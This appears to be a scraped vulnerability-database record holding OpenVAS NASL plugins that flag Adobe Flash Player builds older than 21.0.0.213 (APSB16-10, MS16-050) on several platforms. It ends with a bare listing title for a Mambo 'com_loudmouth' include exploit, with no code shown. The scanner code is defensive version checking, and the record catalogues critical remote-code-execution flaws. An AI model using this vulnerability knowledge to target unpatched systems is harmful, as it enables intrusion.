this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810668\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:54 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-06T14:30:40", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-050", "modified": "2019-05-03T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810666", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810666", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_internet_explorer\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810666\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:00:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-050\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 x32/x64\n\n Microsoft Windows Server 2012/2012R2\n\n Microsoft Windows 10 x32/x64\n\n Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-050\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/ms16-050\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE))\n{\n CPE = \"cpe:/a:adobe:flash_player_edge\";\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)){\n exit(0);\n }\n}\n\nflashVer = infos['version'];\nif(!flashVer){\n exit(0);\n}\n\nflashPath = infos['location'];\nif(flashPath){\n flashPath = flashPath + \"\\Flashplayerapp.exe\";\n} else {\n flashPath = \"Could not find the install location\";\n}\n\nif(version_is_less(version:flashVer, test_version:\"21.0.0.213\"))\n{\n report = 'File checked: ' + flashPath + '\\n' +\n 'File version: ' + flashVer + '\\n' +\n 'Vulnerable range: ' + \"Less than 21.0.0.213\" + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:35:11", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810667", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows", "type": "openvas", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_within_chrome_apsb16-10_win.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810667\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:05:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-11T12:34:09", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "modified": "2018-10-10T00:00:00", "published": "2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810716", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810716", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X", "type": "openvas", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_within_chrome_apsb16-10_macosx.nasl 11816 2018-10-10 10:42:56Z mmartin $\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810716\");\n script_version(\"$Revision: 11816 $\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 12:42:56 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:07:47 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-10) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities\n will allow remote attackers to bypass memory layout randomization mitigations,\n also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.213 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.213 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/flashplayer\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.213\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.213\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

com_loudmouth Mambo Component &lt;= 4.0j Include Vulnerability

Description

Exploit for unknown platform in category web applications

com_loudmouth Mambo Component <= 4.0j Include Vulnerability